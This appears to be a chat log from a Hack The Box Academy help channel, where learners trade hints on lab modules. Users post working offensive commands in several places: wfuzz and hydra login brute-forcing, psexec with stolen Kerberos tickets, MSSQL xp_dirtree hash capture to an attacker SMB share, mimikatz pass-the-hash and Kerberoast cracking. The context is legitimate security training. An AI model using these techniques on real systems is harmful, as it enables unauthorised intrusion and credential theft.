#modules
Well first off you'd need a wifi card like this one: link
With that you can start listening to many different interfaces
airmon-ng is the tool for that
With aircrack you can then crack the required handshake.
Well that's just a smart portion
It prefers Kerberos creds since you're requesting domain info, however since you're providing a valid user and password, it works
It's too long to shrink
:^>
That's what she said..

🙈
well the thing is that it doesn't provide the ST ticket
Stepped outside. It shrank
thanks a lot, I may write it from a theoretical perspective, because I do not have a card to listen with
Use INLANEFREIGHT instead of inlanefreight.local
Domains are weird sometimes
lemme try
Here a small guide/writeup for it
https://medium.com/@brannondorsey/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat-a5a5d3ffea46
It's always a bit hard to understand if you can't do it yourself!
Those WiFi devices that support monitor / inject etc are stupid cheap on eBay
(For educational)
Just gotta be sure to pick the right one
Yea like 40€+
yep, make sure to get one that supports NETLINK like the realtek ones
same thing
I still have mine from a few years ago. Still works like a charm
You can do it with a Pi IIRC
What module/section?
Did a demonstration years ago with one
final assessment for Kerberos attacks q 3
Damn
I didn't know you can

thanks ❤️
however it works on the inside machine which chisel /server is running on
Ah I haven't touched that so couldn't tell you
Maybe only specify user then enter password?
user spn is: HTTP/inlanefreight.local:1433
So they can do the thing
¯\_(ツ)_/¯
Http sounds odd on port 1433
and you can't do anything with that spn? ¯\_(ツ)_/¯
could probably use bloodhound to find the answer
Your message is getting deleted because automod is thinking it's spam
yep
Read and follow #welcome
Also formatting with ``` on the line before and after makes it look better
found the cause... I had the KRB5CCNAME var set up and initialized to ./DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache
in that particular terminal
Ah
I typically will do just single command usage of KRB5CCNAME like this:
KRB5CCNAME='Administrator@TERMSRV_DC01@INLANEFREIGHT.LOCAL.ccache' psexec.py -k -no-pass $dom/Administrator@DC01
hello, I'm on the privesc of Nibbles, I run the sudo command and it asks for a password. The walkthrough says it should just go without it, but it's not
sudo /full/path/to/file.sh
This is assuming 1: you unzipped the file and 2: added the relevant line to the end of the file
yes and yes
A way to find out would be to do a command like sudo -l
Sudo perms require (at least afaik) the full path to the file
At least to abuse them
Gl for next bits
Thanks for the heads up. Should be cleaned up now.
note: use slim ISO for blackarch.
my specific issue, it was a problem with newline characters
that's how I fixed it
If you want to embed images; read and follow #welcome
it was an extra blank line on the end of "end certificate" -_-
ty
btw, can i dm? @supple gorge i think i know u
Haha you might. Feel free to dm
after transferring cert.pfx to the Downloads folder for this module, I'm running the .\rubeus.exe command in that same one, but it's giving me "network password is not correct". Any idea why?
hi
Usually domain controllers are dc01 so maybe that's it?
Usually you can ping the dc
what module
what is wrong with my command
wfuzz -z file,/Desktop/test.txt -z file,/Desktop/test.txt http://83.136.252.32:38065 -d "username=FUZZ&password=FUZ2Z"
module BROKEN AUTHENTICATION
Default Credentials
for one you have two -z parameters
which wordlist u used here
I haven't done that module
gm
Check the response and see if you can get something useful from there, I didn't need to brute-force the login form even though the exercise wants you do that
i solved it with burp but i need help with the wfuzz brute forcing syntax if u can
hey guys, so I recently tried to install Tails OS using a USB stick, but whenever I load it (and boot mode is enabled), it leads me back to Windows. Can anyone suggest how I can change this?
The support bubble won't pop up for me (I've disabled adblock) and whenever I load the page it says adblock is the reason
You probably need to change the boot order in BIOS
You can also contact support by e-mail
Need to speak to a person? Learn how to reach our support via HTB Labs.
okay thank you!
i did still leads to same thing
i have chosen legacy first
The -p for proxy is optional
wfuzz -w usernames.txt -w password.txt -d 'Username=FUZZ&Password=FUZ2Z' -p localhost:8080 http://<target-url>:<port>
You have instructed your PC to boot from your USB stick first?
Is your Linux installed correctly on the stick so that the stick is bootable?
yes, I checked and verified it
Maybe you'd better ask in the channel #homelab-sysadm because it has nothing to do with the Academy modules
Read and follow #welcome
thank you
shouldn't take that long
I'm stuck at ||courses directory in both archive and faculty||
thanks brother, I don't know why the cheatsheet is like this
wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"
yours works, this one doesn't work at all
Because it's using placeholders that you have to change yourself
I for sure changed the placeholders
yup
this is what worked
wfuzz -w dis.txt -w dis.txt -d 'Username=FUZZ&Password=FUZ2Z' http://94.237.63.83:35848
this is what is in the cheat sheet
wfuzz -z file,/path/to/user.txt -z file,/path/to/pass.txt http://127.0.0.1/login.php -d "user=FUZZ&pass=FUZ2Z"
this is what i was using and didnt work
wfuzz -z file,/Desktop/test.txt -z file,/Desktop/test.txt http://83.136.252.32:38065/ -d "Username=FUZZ&Password=FUZ2Z"
the command I have suggested with -w is just an alias for -z (I read the man page), you can try to see if the problem is with the url being positioned in the middle. In the command below it is at the end:
wfuzz -z file,~/Desktop/test.txt -z file,~/Desktop/test.txt -d "Username=FUZZ&Password=FUZ2Z" http://83.136.252.32:38065/
Well /Desktop/ isn't a valid filepath
Unless you have a Desktop file in your filesystem root
Idk if it would let you do ~/Desktop/test.txt
thanks mates ❤️
Ok so I'm out of ideas
All I got rn is || http://archive.academy.htb/courses/index.php|| and ||http://faculty.academy.htb/courses/index.php|| which is nothing
Module name?
Attack web application with ffuf module
which part exactly ?
Stuck at the third exercise
Here it needs you to find a page that ||said 'You don't have access!'||
which one ?
Skill assignment
Are you setting your filter to match content or whatever? So that it matches the text?
-m is for matching
-f is for filtering out
I only filter the matching word rn
Again, make sure you use the right thing with ffuf
-f[n] filters out, meaning you don't see what you put
-m[n] matches what you filter for
Yes, Ik
¯\_(ツ)_/¯
I filter them out because it will show every single one
Plus its length isn't the same
If you're too restrictive then you might miss it
ffuf doesn't have match content, does it?
Also I think no access is like a 401 code if that helps any
It does
Do ffuf --help to see all options
For every -f option there's a -m
I mean its content
I mean there's match lines and match words mode
All I got is 403
403 is the forbidden code, yes
¯\_(ツ)_/¯
Lmao made some adjustments eh?
Ah
During conversation
For the second question on the 1st Brute login assessment, when I run the hydra command, I am not sure why it's saying the rockyou.txt is not found when it's clearly there in the directory.
"Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside"
https://academy.hackthebox.com/module/57/section/515
||hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 94.237.57.59 -s 36768 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='log-in'"||
Try with the /usr/share/ one
Could anyone help me out? How can I search for L____r in PowerShell without the errors? When I only do strings I don't get errors
Connect to the target host and search for a domain user with the given name of Robert. What is this user's surname?
i tried
Get-ADUser -Identity Robert
and it says Robert is wrong or something
can't think of anything else, I'm not gonna lie
wait
i got it
Nice
ah alright
I tried that, but what was also the issue was that I wasn't using the sudo command. For whatever reason, the rockyou.txt that was in the leaked database directory required a sudo command because I needed to use the sudo command in order to open the file.
¯\_(ツ)_/¯

For anyone who has already completed this assessment, How long should it take you to run the hydra command in this case?
not more than 5 minutes
Mine is taking longer than five minutes. Could it be that the lab instance computer processing power isn't the same?
nope
Why do you think mine could be running slow?
If you are using rockyou.txt you would have to change your approach
did you check the hint
||"You may reuse the username you found earlier. Make sure you got the correct fail string and parameters."||
Yes. I already went to the view source code page of that login.php form, looked at the '<form-name=' section and made the corrections for my hydra command.
generate a wordlist based on the requirements presented from the previous assessment
use the name that was found earlier
previous assessment? I am still on the first assessment.
oh, for the first one think of something that lazy administrators do
I corrected the php command, ran it and it currently is still running. Should I create a wordlist rather than use existing wordlists?
||sudo hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 83.136.255.150 -s 32876 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" -t 4||
anyone else seeing huge latency spikes and packet drops us-east-1?
rtt min/avg/max/mdev = 19.223/209.673/1927.075/488.385 ms, pipe 2
Hey Guys - Can I please have some assistance on this - INTRO TO ASSEMBLY LANGUAGE
During our examination of the USN Journal within Timeline Explorer, we observed "uninstall.exe". The attacker subsequently renamed this file. Use Zone.Identifier information to determine its new name and enter it as your answer.
Need help on this Digital Forensics module
I found the Zone.Identifier with the IP + file name but the filename is still uninstall.exe 🤔
Zone.Identifier information never changes. based on that, think of something to check to correlate the Zone.Identifier info
no
it doesn't matter how many excuses you give, nobody is giving you the flag
if you're having issues with connectivity and it's not on your end, reach out to support
if the module didn't give you these creds, delete this message
i dmed u
alright then can u elaborate more on the zoneinfo thing, i still dont get what u mean
the zoneinfo in the MFT just shows uninstall.exe though :/ I filtered every zoneinfo in the MFT and only found other unrelated exes
you have the Zone.Identifier info, and you know the attacker renamed the file. how can you determine file rename events?
once you figure that out, correlate what you find with the Zone.Identifier information, and you will know which file was renamed
just look for file rename events
ahhh alright, thanks a lot!
Hello, I need help to solve an easy problem of HackTheBox, it is a challenge. This does not require any knowledge in VHDL but rather it is about the logic of it, to be able to decipher the flag. VHDLOCK to be more exact. Any help, write to me in DM, thanks
Which module and which section?
I am still stuck on - "Intrusion Detection With Splunk (Real-world Scenario)" Q3 find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
I've tried - 'clr.dll | stats count by Image'
Get around 26 results, but none of these were the answer.
clr.dll | stats count by ProcessName ParentProcessName
Similar processes found in .exe but none of these were correct either. Any hints or DM assistance appreciated.
Hi! I'm stuck on an easy section on the "LINUX PRIVILEGE ESCALATION" module, "Sudo Rights Abuse".
"What command can the htb-student user run as root?"
In my world I was sure that I just had to check "sudo -l". But apparently I'm missing something, right? openssl gets marked as incorrect
did you check the GTFObins ??
for openssl?
maybe
I could check, but I thought the question was which command I could run as root, whether it was exploitable or not?
aaah maybe check with the absolute path
wow that did it haha. Thanks
hello guys, a quick question regarding AD: in a DC, does the builtin\Administrators group have higher privileges than Domain Admins on that DC particularly?
The top answer here should help: https://serverfault.com/questions/174200/domain-admins-vs-administrators-in-windows-ad-dc
thanks
yea I think builtin\Administrators have higher privs on the DC itself than the Domain Admins
It's been like this for a while
Sorry for a general question, but is there any way to debug why the ssh connection is super laggy? Switched vpn, didn't work. Trying to figure out if it's the box or something I can do on my machine
ok got it, idk how I missed the obvious answer, but thanks a lot for helping 🫡
Can anybody help me understand the highlighted line? does that mean that the IP address of the Decoy must be a real one that is running?
Why I can't Post images
because you didn't follow the rules
Hy
Good afternoon all. I have a question. I am working on the "Using Web Proxies" module and I am stuck on the section on "ZAP Fuzzing". I had no issue with the content, and was able to half way through the question at the end, but I am stuck. I fuzzed the cookie using the wordlist as instructed, but I am not seeing a flag returned, or any clue on how to proceed. I am just looking for a little guidance, not the full answer. SOLVED
Hi, I'm doing the YARA and Sigma module and have been stuck on one question for days and I can't solve it at all. Help
The "C:\Rules\yara\seatbelt.yar" YARA rule aims to detect instances of the "Seatbelt.exe" .NET assembly on disk. Analyze both "C:\Rules\yara\seatbelt.yar" and "C:\Samples\YARASigma\Seatbelt.exe" and specify the appropriate string inside the "$class2" variable so that the rule successfully identifies "C:\Samples\YARASigma\Seatbelt.exe". Answer format: L________r
I understand that you need to do strings or look in HxD and I have done that and been scrolling for hours. Someone tell me how you guys got it without wasting so much time
hi, i cannot log into my account anymore where can i contact support for academy?
Need to speak to a person? Learn how to reach our support via HTB Labs.
Hi, are there problems if I used Nmap on a random website?
yeah, you're not authorized to test those machines
Can I use xrdpfree to download the damn Seatbelt.exe and just run grep on it?
help
Seatbelt.exe is a .NET assembly. there should have been some info earlier in the module about analyzing those. review the Manually Developing a YARA Rule section
I have done strings on it as that section tells you to, but I have been scrolling for hours
read carefully. it is a .NET assembly that you are analyzing. look at the section again
there's a program that you can use that will help immensely
I tried this command but only errors monodis --output=code Seatbelt.exe
did you try anything else
yes im reading about monodis but i only keep getting errors from it
try another program
So they detected it as a threat
Ok i have opened it in dnSpy now
did you seriously just do that?
found it, thank you so much
Does someone see the bug here in the hash format of a Kerberoasting attack? I dumped it with Rubeus.
Is it all on 1 line?
And have you tried with hashcat?
I have applied a xargs to put it on the same oneliner and nothing.
Did you end up finding this with dnSpy?
Can you open it in a text editor for me?
And try with hashcat
Instead of John
hello, I'm doing Attacking Common Applications - Skills Assessment II and on the question "What is the name of the public GitLab project?" I have found the public GitLab project but it's not taking the name as the correct answer, so I'm not sure if it's in a different format or there's a different name somewhere inside of the project, bc ik it's that one since I used that project to complete the rest of the other questions
For tgs it's 13100
It is in a one-liner
18100 is for asrep
13100
Aaa okay, it already worked with that mode, thanks
But with john it should also work, right? It should detect the hash
It should auto detect
If you're unsure always check the signature with the hashcat wiki
If it doesn’t you can just check example hashes
John can be a bit dumb at times
Jajajaja
Try specifying --format=krb5tgs
And I believe it should be -w= instead of -w:
Also I don't recall the format being -w:
I use --wordlist=
That could also be a contributing factor
Are you still doing -w:
If it's the way I've always done it
Weird.
You’re using the same hash?
yes
As in one screenshot you use hash, and the other hashes.kerberoast
Because I copied it to another file, but come on, the hash file with hashcat works but with john it does not.
🤷🏼♂️

Heh question, I'm on Footprinting > SMB , final question
What is the full system path of that specific share? (format: "/directory/names")
but when I put in /home/sambauser or /home/sambauser/contents It says neither of those are correct
Why contents instead of the name of the share?
because it asks for full path
Path looks like /home/sambauser/sambashare in that case
nope
Hint says otherwise
Remember that Linux-based operating systems do not have a "C:" drive.
This is last question of footprinting smb?
yes
/home/sambauser
That should work
it did, but i had already done that, lol
Perhaps a typo
i'll assume that, call me crazy
You’re crazy
thanks, so i had the right idea but must have been a typo or something
And thanks, I am crazy

"I swear I tried that" is a mood echoed too many times
A darker blue. Like more of a teal
congratz for the role marcie
deserved
😦
new role ?
yeah , I just read that
Hello everyone
My question: if I want to know traffic analysis, is it important for networking?
Analyzing network traffic is important for SOC roles
Also pentester
I read it in pentester
Eh there's tools used that sniff specific things on the network
But you're not needing to manually sift through anything
Its for tcp udp right
what's up y'all, I'm just trying out academy and starting out in the AD enum & attacks module to get a feel for how this all works. Going through the "Initial enumeration of the domain" portion and running wireshark in the rdp session currently. I'm not getting any MDNS packets as the material specifies how we can identify the "ACADEMY-EA-WEB01" host. I'm only getting NBNS packets showing ACADEMY-EA-WEB0. Just wondering if I'm doing something wrong or that this is expected
It's a minor bug
ahhh gotcha. Just wanted to make sure, I was racking my head like what could be different with what I'm doing lol
Also ad enum and attacks is a midpoint module for the pentester path
And assumes knowledge of concepts that may have been presented previously
Right, I'm coming over from finishing the TCM Sec PEH course
Every module has a "pre-requisite" module so to speak
It's also recommended to do the CPTS path in order
Just trying to find material related to what I went over in that course and find other ways to go about using the same tools or find new tools that weren't used in that course
just a recommendation as CPTS is more challenging and thorough than other intro pentest exams ¯\_(ツ)_/¯
Completely understand! Thanks for the info
And if anything, if you already know the tools and techniques, you can breeze through the early bits
Yeah I hear that, they didn't go through packet sniffing for enumeration on an internal network in the PEH so that caught my attention right at the beginning hahaha
Which there's dedicated tool
Yes
I will start after
The pentesting
Cpts
After the info security
Going to pentesting, after that I will take CPTS in Hack The Box
And taking bug bounty
@fathom pendant
Is that a question?
Please stop mentioning me, you're not posing a question so whatever works for you
What you mean whatever works for you
As in whatever path forward works to get you to your goal
echo $PATH
Thank you I will study towards /usr/local/sbin first
does anyone have any idea about this error? sudo apt install crackmapexec
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.
I try to install python3-neo4j, I get an error, I can't fix broken packages or something, there are none
what OS are you using?
Parrot
ah yeah no idea what that comes with. sounds like you need to install python3-neo4j first. you could also just try installing netexec instead, as it's the successor to cme.
it doesn't let me install neo4j, I really don't know why
probably have to read the error messages
Get netexec instead of cme
Check their site to see how to do it
thanks for the help
when will this happen
Cme generally isn't installed via apt
Also install netexec instead
It's already available for annual subs
It's in settings
I need help
with......... ?
module:Password attacks
Section:pass the hash
Got the david flag quite easily, but still a question on my mind since AD is probably the thing I've worked with least in the past:
|| so once you pass the david hash you get a shell as NT authority. Is there a reason you cant access DC01 david with impacket-smbexec? after i failed with it, i tried with with mim and it worked. ||
Feeling like i'm missing something obvious in 'Attacking Common Services : Attacking SQL Databases" on the first question...which is just "What is the password for the 'mssqlsvc' user?" lol....We are given creds to login, which I use to show me the tables (master, msdb, tempdb, hmaildb, flagdb)....don't have permissions to the last two. I've seen other hints to use Responder and capture the MSSQL hash...but that's not doing anything for me as xp_dirtree shows nothing and no permissions for xp_subdirs. Also can't enable xp_cmdshell due to privileges. I've tried a one-liner for impersonation to mimic the command in the module (see below) but that also returns blanks:
```sql
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO
```
Used impacket-mssqlclient.py to access SQL. Any hints that extend beyond 'check responder section' or "USE <DB name> to use a DB, SELECT * FROM <DB Name>.INFORMATION_SCHEMA.TABLES to get tables in a DB, SELECT * from <table name> to get table contents"....would be amazing as I don't see any tables in any of those DBs listed above that are going to give me the info I'm looking for...password, hash, or otherwise.
System isn't a domain account
well i understand that but both were nt authority, the mimikatz and via impacket
I don't recall elevating anything ¯\_(ツ)_/¯
I just connected via smbclient and read the thing
It's been a minute though
I might be thinking of PTT
that one is showing a flag
have you turned on responder?
i'm going to guess because david has access to that and the system account doesn't
^
Because DC01 is a separate machine it doesn't have the same permissions
ACLs go brrr
so just because i added /domain:xxx.htb it worked on mimikatz?
Thank you for this info, glad I was here to see it!
no. we have no idea the steps you took up to this point, but that file can only be accessed by the account 'david', and on the screen where you don't have access you're not logged in as david so you don't have permissions to view it
i can dm you the steps but for me both look like they are nt authority?
maybe im just plain stupid here and missing the point

does your mimikatz syntax include /user:david and /run:cmd.exe?
it does
that's why
when you do that, it opens a cmd.exe window under the user context of david
with his permissions
oooh so im actually in davids permission with that
yes
nt authority/system is the local system account for the computer, david's account is an active directory account. the local system doesn't have privileges to access david's files
yea I guessed that but was confused why one has priv while the other doesn't if they are both the same user, but yea seems like with mimi we got david's perms while still under nt auth
makes sense, tyvm
That "Using Web Proxies" module just about cooked my brain, but I managed to finish the skills assessment!
Is there some tech support I can contact regarding this attacking common services/attacking SQL Databases module? I've done the 'Show Solution' option and on both(separately) my box and the PWNBOX to steal the MSSQL service account hash..following step-by-step and the hash does not show up via the documented impacket-smbserver or when I tried responder instead. Also tried terminating and starting up a fresh version of the target server
looked on the site but didn't see anything
How are you trying to grab the hash?
xp..dirtree //your_ip/share
Try using the command exactly as shown in the module
Responder also needs to be specified to your tun0 interface
like responder -I tun0?
i've done the commands exactly as shown...the one command that I'm wondering about is sudo impacket-smbserver share ./ -smb2support, but i'm assuming the ./ is the share for the 'current working directory' on your box
well, you say you've done the commands exactly as shown, but what you showed us here is not the same as what's in the module. so which is it?
Yes
Correct cwd
Smb requires the sharename to connect
The sharename is "share"
smbserver <sharename> <path> [options]
sqlcmd -S 10.129.251.65 -U htbdbuser
sudo impacket-smbserver share ./ -smb2support
(inside sql):
EXEC master..xp_dirtree '\\10.129.251.65\share'
go
Why are you using the box ip?
yeah i don't think 10.129.251.65 is "your_ip"
How do you steal the hash if you don't have it connect to you
Is it normal when using pwnbox that every 3-5 minutes your ssh session to the target you connect to is no longer responsive and then you have to kill the target and respawn it?
no, only really see that if people are brute forcing incorrectly or something
I am doing linux fundamentals in academy and just running ls commands and the target stops responding, as well as to pings. Respawning a new target fixes it for about another 3-5 min
no one here can really help with that, you'll have better luck reaching out to support on the site
Try changing vpn regions (vpn is different from Pwnbox)
And yes, it will affect even though your using pwnbox
Pwnbox region = attack box
Vpn region = target box
Does changing the VPN server's region work even if I don't download the VPN connection file? Is it associated with my account, so when I spawn a target it uses the VPN Servers dropdown I had selected?
AD Enumeration & Attacks - Skills Assessment Part I
I try to upload chisel thru the webshell but it just gives me an error and won't upload chisel
try reading the error
Yes, as I just said
Vpn region dictates spawn region for the targets
Okay thank you. I am testing that
Use the IP address that you spawned with the port number.
You might need to restart the pwnbox for it to work right
We need more information beyond 'there's an error', we can't see your screen or the error or anything. that said, there are many ways to transfer files. try using the shared folder function in remmina, or the /drive parameter in xfreerdp.
Server Error in '/' Application.
Runtime Error
Description: An application error occurred on the server. The current custom error settings for this application prevent the details of the application error from being viewed remotely (for security reasons). It could, however, be viewed by browsers running on the local server machine.
Details: To enable the details of this specific error message to be viewable on remote machines, please create a <customErrors> tag within a "web.config" configuration file located in the root directory of the current web application. This <customErrors> tag should then have its "mode" attribute set to "Off".
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="Off"/>
</system.web>
</configuration>
Notes: The current error page you are seeing can be replaced by a custom error page by modifying the "defaultRedirect" attribute of the application's <customErrors> configuration tag to point to a custom error page URL.
<!-- Web.Config Configuration File -->
<configuration>
<system.web>
<customErrors mode="RemoteOnly" defaultRedirect="mycustompage.htm"/>
</system.web>
</configuration>
looks like the first two paragraphs explain how to view the error. how did you start this web server?
are you able to execute code? even if you're able to upload chisel, without code execution it isn't going to do much. maybe focus on getting a shell first.
Configuration was wrong here for cert.pfx. I used proper vpn and re did all steps I needed to and it worked.
Sad :( I was gonna repost it so it embeds
Nice. What is next?
tbh don't know, probably will finish something on the close subj, like DACL attacks
ad/windows
DACL attack was really fun
ye?
so was ADCS if you haven't done that
I start that one tomorrow. I just finished LDAP and did it all with windapsearch, ldapsearch and ldapsearch-ad from linux. Learned a lot.
👍
I have read somewhere that CPTS is closest to what presented on OSCP, is that true guys?
I haven't taken the CPTS, I do have the OSCP. OSCP seems a bit more script kiddie type of test. Find application name/version, search for exploit to get foothold.
CPTS does not seem to include known vulns with existing POCs for footholds. At least that is the feeling I get.
Got it, thank you
- 1 Submit the contents of the C:\flag.txt file on MS01. any advice on how to access ms01? AD Enumeration & Attacks - Skills Assessment Part II
i tried xfreerdp ssh power etc
It surpasses OSCP in depth
Doing the CPTS exam right now and looked over the course material for OSCP, and CPTS covers 95% of what you need to know for OSCP. If you are interested in either then I would do the CPTS path and once you have your CPTS go for OSCP. CPTS will be more useful and teach you more but OSCP will look better on a CV. OSCP doesn't cover nearly as much or as in-depth as the CPTS
You have a username and password, use those
ik i got it
Remember the entirety of the domain is on an internal network
So you either have to A use the provided linux host to jump from or B use a pivot
┌─[✗]─[htb-student@skills-par01]─[~]
[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - failed to open display:
[20:36:53:930] [1517:1517] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
and ok thanks, does this mean I connected to it too early?
Bro, spoilers for q 1 and 2
soz
If you're ssh into the linux box, that's why
Ssh doesn't carry a display variable
you can rdp to the linux box btw
or use pivoting techniques to allow you to connect directly to the MS01 host
lol cant be that easy xd
Not easy, but to me it seems more straightforward.
without doing either it seems to me like oscp is a beginner pentest cert while cpts is more intermediate
There is something to a test that says use any tool you want, and it is still tough, versus a test that restricts tools for fear it will be too easy.
- 1 Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain. any tips for this? i tried requesting all spns but none i found all computers, dc and mssql host etc
For enabling Live Rule Reloading Feature through suricata rulesets, when I edit the suricata.yaml file, there is no detect-engine in that file... just curious if im missing something
Brother
Slowly go through the techniques outlined in the module
They will each be useful parts of enumerating the answer
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
why dont this work
do you have an $sid variable set?
Is this the right place to ask a question? I've reached the end of the Intro to Assembly Language module. I'm trying to figure out how to optimize my assembly code for shellcoding to be less than 50 bytes:
```nasm
global _start
section .text
_start:
    ; push '/flg.txt\x00' onto the stack
    xor rdi, rdi
    push rdi                ; push NULL string terminator
    mov rdi, '/flg.txt'     ; rest of file name (8 bytes)
    push rdi                ; push to stack
    ; open(rsp, O_RDONLY)
    mov rax, 2              ; open syscall number
    mov rdi, rsp            ; pointer to filename
    xor rsi, rsi            ; O_RDONLY flag (0)
    syscall
    ; read(fd, buf, 24)
    lea rsi, [rdi]          ; reuse the filename buffer on the stack as the read buffer
    mov rdi, rax            ; fd returned by open
    xor rax, rax            ; read syscall number (0)
    mov dl, 24              ; size to read (rdx is zero at process start)
    syscall
    ; write(1, buf, 24)
    mov rax, 1              ; write syscall number
    mov rdi, 1              ; fd = stdout
    mov dl, 24              ; size to write
    syscall
    ; exit(rdi)
    mov rax, 60             ; exit syscall number
    ;mov dil, 0
    syscall
```
ya
i'd ask you to format it better, but automod will be likely to yeet it. (if you read and follow #welcome automod won't yeet it and you can wrap it in ``` to make it more readable)
spraying a password can yield some results, look into the sections that set that up
including ones that would get you domain usernames as a list to pull from
i cok danke
again
as stated; everything you need to complete this (for the most part) is in the module
another revolves around uploading a shell
i c ok danke, u got any recommendation for a password list? im using top 200 and there are about 50 accs so... this is gonna take a long time...
you don't need a password list to spray
if you're using a password list it's no longer spraying
it's bruteforcing
use a simple easily guessable password
maybe what might be used as an onboarding password
ohh i c anke
I really heavily suggest re-reading and revising your notes on this module
you're overlooking some fairly simple things; tip: when stuck in a module skill assessment -- go through the other module sections, in order, and see what sticks for your scenario
based
I am trying to do the Windows file transfer module. I have to transfer/upload the file to Windows without RDPing. There is an FTP server running. I can't use `ftp IP` then user htb-student and HTB_@cademy_stdnt! Perhaps the problem is with the special characters in the password. I also have tried to use `ftp htb-student:HTB_@cademy_stdnt\!@IP` and `ftp "htb-student:HTB_@cademy_stdnt\!"@IP` but none worked.
Any suggestion?
which section is this? IIRC for any section with a windows target, they provide RDP connection instructions
yeah for windows targets they tend to be rdp; i don't recall ftp being open for them
Thanks for responding. I am NOT having problem with RDPing!
As per the question: Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
As per my understanding, we first have to upload the file to the Windows host and then RDP into it to unzip and run `hasher upload_win.txt`. I don't know how to upload it without using RDP first.
you can upload with rdp in many ways
xfreerdp has /drive:, you can start an smbserver, you can host an http server
errr we should probably re-word that question 😅 . I think its intended for us to RDP to the box , transfer the file archive + unzip, then run hasher
yeah the word order is off
unless it has something like webDAV running I'm not sure there's any other way to do it. Maybe smbclient?
or even omitting the "RDP to the box" portion
Once uploaded unzip the archive, and run "hasher upload_win.txt"
Ok. Rewording makes sense... else I was beating myself up for being too noob to not come up with something.
i mean you can always scan the box to see what's there
I did
nmap $IP
ftp, smb
is ftp running?
yes
hmm
we could also try connecting to smb as htb-student
could just be a weird thing with your connection not wanting to fully connect to ftp
sometimes it can take a minute after you connect to ftp for it to prompt for username and password
Broken Authentication - Weak Bruteforce Protections: in this module how can i do it with burp, because i feel like the script provided is not working
nevermind i did it with burp ❤️
now why the script didnt work ? xd
let me make a note of this , the question might need to be re-worded. It's possible I'm being a dummy but I can't connect to any smb share as htb-student, or ftp, or anonymous ftp . So not sure what other file transfer method we have, besides RDPing into the box
per the official walkthrough: the first step is to RDP
so yeah; wording
roger that . Give me a bit and ill get it updated 💪
note: winrm doesn't work either
i blame g0blin
CrackMapExec.
re-read that section very carefully
lmk and i can send you a modified version of basic_bruteforce.py. Basically, we need to modify it to use regex. So instead of `valid = "welcome"`, it's `valid = "HTB{anything}"`
If you are still stuck, re-read the "Shares" section of the Service Scanning section
Oh. Is it the ||NULL||? or something to that effect?
I'll DM you real quick if that's ok
Sure since I'm lost on context anyway lol
wow... just respect, still helping people here, you earned my respect, and now i sense that you do this because you actually wanna help people, wish we all had one of marcie's traits in us 😄
For anyone that's done the Advanced XSS module. In the Skills Assessment, is the "Deliver to Victim" feature in the exploitserver.htb used?
yeah
Thanks!
I’m trying to follow along with the exercises in the Linux fundamentals module, but it says I’m not in the sudoers file and that I will be reported to the authorities… 🫤
thanks mate, i will appreciate it if u have time to send me the script
gg
Oh… forgot I was ssh into the host machine.
Works on my own pwnbox. 😬
can someone help me with this: Broken Authentication/Brute Forcing Passwords
have you found the minimum policy? Then it's just matters of using the one liner in the module with some minor changes to get a list of possible passwords
Another day to remind y'all that I'm stuck. "Debug the attached binary to find the flag being pushed to the stack" - here I have gotten a lot of flags in the given code but none was correct. Pls, if you have passed Intro to Assembly Language I need help pls.
I disassembled the binary, analysed the flag and used GPT to convert the hex value of the flag being pushed to the stack into the flag, yet none of it is correct. I tried submitting the hex value directly yet I'm getting incorrect. Pls I need help if you have done this module; it's the final module on my SOC analyst prerequisite path.
for the skills assessment in the DFIR module, is there an easy way to analyze the json file for suspicious processes?
the question Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe
In "SOCKS5 Tunneling with Chisel" from "Pivoting, Tunneling, and Port Forwarding", when i compile chisel it uses a newer version of GLIBC, which is not present on the pivot host. What is a good way to resolve this? I can't update the GLIBC version on the pivot host. Is there a way to build it against an older version?
no, i'm kinda 100% lost here. first, a lot of options are available for the policy, like it contains everything except all small letters. second, the rate limit: the X-Forwarded-For IP doesn't do it
Nothing actually gets reported btw
just got it, its not related to VAD at all lol, try different collection methods 😉
you will have to compile it statically or download an old version of the pre-compiled binary.
Try version 1.74 or downwards
Thanks, that did it for me 🙂 Maybe the machine should be updated
If anyone can educate me more about this module i will appreciate it
It's just fine as it is, considering it's still workable
I am on a computer connected to a domain. I have listed the users against which you can apply Kerberoasting with PowerView. The thing is that I do not have the clear-text password of the local administrator user of the computer I am connected to. Can this same thing be done from my Kali machine with GetUserSPNs?
Because I don't have valid credentials for any domain user at the moment.
From my kali I don't have direct communication with the DC, but I have an open tunnel with chisel.
Even indirect communication, it's reaching the DC somehow
Perhaps listening on the network will be more helpful. Something might Respond
Yes, but I wonder if this same thing can be done from my kali machine, since I don't have valid domain credentials for any user, and my machine is not joined to the Domain.
¯_(ツ)_/¯
Without context of the module or section you're doing I have 0 idea what you're referring to
